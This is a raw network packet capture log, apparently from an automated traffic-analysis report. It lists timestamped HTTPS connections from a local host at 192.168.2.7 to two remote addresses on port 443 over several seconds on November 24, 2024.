                                                                                                                                                                        Nov 24, 2024 05:12:59.581687927 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.581693888 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.590740919 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.590781927 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.590884924 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.591033936 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.591047049 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.626635075 CET44350069142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.628002882 CET50069443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:59.628035069 CET44350069142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.629234076 CET44350069142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.629787922 CET50069443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:59.629921913 CET44350069142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.677020073 CET50069443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:59.801405907 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.804546118 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.806898117 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.806981087 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.806999922 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.807010889 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.807017088 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.809112072 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.812314034 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.812388897 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.812475920 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.813954115 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.813977957 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.813990116 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.813997984 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.816943884 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.816989899 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.817003012 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.817033052 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.817101002 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.817105055 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.817243099 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.817254066 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.817403078 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.817421913 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.850888968 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.851507902 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.851530075 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:59.851901054 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:59.851907969 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.032818079 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.032856941 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.032913923 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.033076048 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.033076048 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.033246040 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.033268929 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.033282042 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.033288002 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.036216974 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.036252022 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.036339045 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.036535978 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.036546946 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.304418087 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.307512045 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.307584047 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.307625055 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.307642937 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.307655096 CET50070443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.307661057 CET4435007013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.310787916 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.310832977 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:00.310966969 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.311089039 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:00.311100960 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.386679888 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.393948078 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.393973112 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.397989988 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.397995949 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.543947935 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.545778036 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.545809031 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.546319008 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.546324968 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.660686970 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.661216021 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.661252975 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.663322926 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.663330078 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.753421068 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.753925085 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.753962040 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.754507065 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.754513025 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.830322027 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.833467007 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.833513021 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.833518028 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.833564043 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.834830999 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.834855080 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.834871054 CET50071443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.834877968 CET4435007113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.838968039 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.839016914 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.839083910 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.839255095 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.839268923 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.978188038 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.978255987 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.978317976 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.978534937 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.978550911 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.978560925 CET50072443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.978566885 CET4435007213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.981458902 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.981508017 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:01.981601000 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.981733084 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:01.981748104 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.089474916 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.090002060 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.090023994 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.090579033 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.090583086 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.113423109 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.116805077 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.116986990 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.116986990 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.116986990 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.119719028 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.119752884 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.119837046 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.119976997 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.119992018 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.187798977 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.187999964 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.188056946 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.189670086 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.189683914 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.189692974 CET50074443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.189697981 CET4435007413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.196953058 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.196996927 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.197057009 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.197701931 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.197716951 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.429112911 CET50073443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.429155111 CET4435007313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.533066988 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.536238909 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.536290884 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.536473989 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.536473989 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.536473989 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.539617062 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.539676905 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.539794922 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.539922953 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.539942026 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:02.851010084 CET50075443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:02.851041079 CET4435007513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.795766115 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.796441078 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.796477079 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.796943903 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.796947956 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.855743885 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.856559038 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.856585026 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.856914997 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.856920004 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.909980059 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.918061972 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.918093920 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.918550014 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.918560028 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.977966070 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.978553057 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.978580952 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:03.979033947 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:03.979038954 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.247885942 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.250036001 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.250267029 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.253029108 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.253046036 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.253056049 CET50076443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.253062963 CET4435007613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.256361008 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.256392002 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.256458998 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.256601095 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.256613970 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.308150053 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.311486006 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.311577082 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.311753035 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.311753035 CET50077443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.311765909 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.311774015 CET4435007713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.314227104 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.314254045 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.314317942 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.314450026 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.314467907 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.353070021 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.356173992 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.356273890 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.356297016 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.356303930 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.356312990 CET50078443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.356317043 CET4435007813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.358753920 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.358791113 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.358867884 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.359002113 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.359008074 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.383044004 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.383598089 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.383620024 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.383968115 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.383975029 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.430654049 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.433818102 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.434029102 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.434029102 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.434029102 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.436969042 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.437015057 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.437122107 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.437335968 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.437350988 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.743721008 CET50079443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.743750095 CET4435007913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.835844040 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.839257002 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.839354038 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.839387894 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.839411020 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.839423895 CET50080443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.839431047 CET4435008013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.842417002 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.842467070 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:04.842559099 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.842710018 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:04.842722893 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.037997007 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.038530111 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.038552046 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.039005995 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.039014101 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.040205956 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.040466070 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.040493965 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.040797949 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.040815115 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.213538885 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.216531992 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.227571964 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.227586985 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.228226900 CET50083443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.228241920 CET4435008313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.228533983 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.228545904 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.228899002 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.228904963 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.473390102 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.476275921 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.476396084 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.476547003 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.476566076 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.476596117 CET50082443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.476603985 CET4435008213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.480979919 CET50086443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.480995893 CET4435008613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.481065035 CET50086443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.481232882 CET50086443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.481245995 CET4435008613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.487860918 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.487936974 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.488013029 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.488101006 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.488116026 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.488152981 CET50081443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.488158941 CET4435008113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.490497112 CET50087443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.490525961 CET4435008713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.490611076 CET50087443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.490720987 CET50087443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.490734100 CET4435008713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.620461941 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.621320009 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.621345043 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.621802092 CET50085443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.621809006 CET4435008513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.659293890 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.662550926 CET4435008413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:06.662621975 CET50084443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:06.662694931 CET50084443192.168.2.713.107.246.63
